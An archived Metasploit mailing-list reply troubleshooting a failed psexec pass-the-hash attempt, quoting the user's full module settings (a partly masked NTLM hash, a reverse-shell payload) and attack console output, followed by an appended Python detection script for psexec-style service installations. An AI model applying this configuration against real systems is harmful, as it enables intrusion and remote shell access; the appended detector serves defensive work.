Metasploit mailing list archives
Re: psexec
From: Enis Sahin <enis.c.sahin () gmail com>
Date: Thu, 20 Oct 2011 08:54:56 +0300
Could be because "Vista/Win7/2008 with UAC drops admin privs on SMB shares for local users, which prevents the psexec module from writing its executable/service to the remote host when using a local admin credential."

Source: http://dev.metasploit.com/redmine/issues/5316

Enis

On 19/10/2011, audio audience <audience099 () gmail com> wrote:
> Hello All,
>
> I have a remote system. It is running a win2k8 x86 system and I have all
> users' hashes. However, I ran the psexec exploit but it couldn't complete
> successfully.
>
> - Disabled antivirus
> - Checked regedit key: "RequireSecuritySignature" set to "0".
>
> http://www.offensive-security.com/metasploit-unleashed/PSexec_Pass_The_Hash
>
> Do you have any idea about this?
>
> msf exploit(psexec) > show options
>
> Module options (exploit/windows/smb/psexec):
>
>    Name       Current Setting  Required  Description
>    ----       ---------------  --------  -----------
>    RHOST      [IP Address]     yes       The target address
>    RPORT      445              yes       Set the SMB service port
>    SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
>    SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
>    SMBPass    aad3bxxxxxxxxxx33435b61404ee:a7649e53c5d07306b78bfc7b2029a798  no  The password for the specified username
>    SMBUser    Administrator    no        The username to authenticate as
>
> Payload options (windows/shell_reverse_tcp):
>
>    Name      Current Setting  Required  Description
>    ----      ---------------  --------  -----------
>    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
>    LHOST     0.0.0.0          yes       The listen address
>    LPORT     4443             yes       The listen port
>
> Exploit target:
>
>    Id  Name
>    --  ----
>    0   Automatic
>
> msf exploit(psexec) > exploit
>
> [*] Started reverse handler on 0.0.0.0:4443
> [*] Connecting to the server...
> [*] Authenticating to [IP Address]:445|WORKGROUP as user 'Administrator'...
> [*] Uploading payload...
> [*] Created \uqSjtJEP.exe...
> [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl] ...
> [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl] ...
> [*] Obtaining a service manager handle...
> [*] Creating a new service (nGbXrAdw - "MUQefrtYtKijwX")...
> [*] Closing service handle...
> [*] Opening service...
> [*] Starting the service...
> [*] Removing the service...
> [*] Closing service handle...
> [*] Deleting \uqSjtJEP.exe...
> [*] Exploit completed, but no session was created.
> msf exploit(psexec) >
--
http://www.enissahin.com | http://twitter.com/enis_sahin
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
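
For defenders, the sequence in the quoted output (a file written to ADMIN$, then a service created, started and removed) leaves a service-installation record even when no session results. The following is an added example, not part of the original post or of Metasploit: a Python check that scores constructed records shaped like Service Control Manager event 7045. The field names, the image path form and the eight-letter heuristic are assumptions.

```python
import re

# Constructed records shaped like Service Control Manager event 7045
# ("A service was installed in the system"). The first reuses the service
# and file names from the post; its image path form is an assumption.
SAMPLE_EVENTS = [
    {"host": "srv01", "service": "nGbXrAdw", "image": r"%SYSTEMROOT%\uqSjtJEP.exe"},
    {"host": "srv01", "service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe"},
    {"host": "srv02", "service": "BackupAgent", "image": r'"C:\Program Files\Backup\agent.exe" --svc'},
    {"host": "srv02", "service": "PSEXESVC", "image": r"C:\Windows\PSEXESVC.exe"},
]

# ADMIN$ maps to the Windows directory, so an uploaded file lands directly
# in its root rather than in System32 or Program Files.
ROOT_EXE = re.compile(r'^"?(?:%systemroot%|[a-z]:\\windows)\\([^\\"]+)\.exe\b', re.I)


def looks_random(name):
    """Eight ASCII letters, mixed case, with an upper-case letter past the
    first position: the shape of both generated names in the post."""
    letters = bool(re.fullmatch(r"[A-Za-z]{8}", name))
    return letters and any(c.isupper() for c in name[1:]) and any(c.islower() for c in name)


def reasons(event):
    """Return the psexec-style indicators present in one event."""
    found = []
    m = ROOT_EXE.match(event["image"])
    if m:
        found.append("binary in Windows root (ADMIN$)")
        if looks_random(m.group(1)):
            found.append("random-looking binary name")
    if looks_random(event["service"]):
        found.append("random-looking service name")
    return found


def suspicious(events, threshold=2):
    """Events carrying at least `threshold` indicators, with their reasons."""
    hits = [(e["host"], e["service"], reasons(e)) for e in events]
    return [h for h in hits if len(h[2]) >= threshold]


if __name__ == "__main__":
    for host, service, why in suspicious(SAMPLE_EVENTS):
        print(f"{host}: service {service!r}: {', '.join(why)}")
```

Only the first constructed record reaches the threshold; the PSEXESVC record matches a single indicator and is left for a separate rule.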
Current thread:
- psexec audio audience (Oct 19)
- Re: psexec todb (Oct 19)
- Re: psexec Enis Sahin (Oct 19)